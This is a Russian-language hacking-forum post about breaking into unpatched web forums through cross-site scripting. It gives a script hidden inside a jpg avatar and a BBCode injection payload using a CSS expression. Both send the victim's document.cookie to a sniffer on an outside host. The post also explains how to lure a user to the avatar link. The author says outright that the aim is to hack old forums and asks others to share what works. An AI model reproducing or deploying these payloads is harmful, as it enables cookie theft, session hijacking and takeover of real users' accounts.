++++++++++++++++++++++++++++++++++++++
На ура работает xss с аватарой, подробно описано в статье censored! .
Видео: по phpnuke от Green_Bear
Создаём jpg-файл с кдом внутри
Код:
<script>img = new Image();
img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Загружаем на какой-нить сервер. С форума загружаем эту картинку себе на аватар. Затем отправляем юзеру ссылку на этот аватар(который уже на сервере этого форума), и идём ловить куки на сниффер.
++++++++++++++++++++++++++++++++++++++++
Нужно проверить ещё этот код:
Код HTML:
[url]www.ut[url=www.s=''style='display:none;'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]
Не знаю, может я его неверно подправил...
++++++++++++++++++++++++++++++++++++++
В общем, у меня всё...оставьте свои замечания, у кого что когда получалось чем.
Зачем мне это нужно? Просто часто необходимо взломать какой-нибудь задрипанный форум версии где-нить 2.0.6, а потом оказывается что ничего не проходит...форум пропатчен...обыдно, когда всякое старбе не получается взломать...поделитесь своими соображениями, плиз...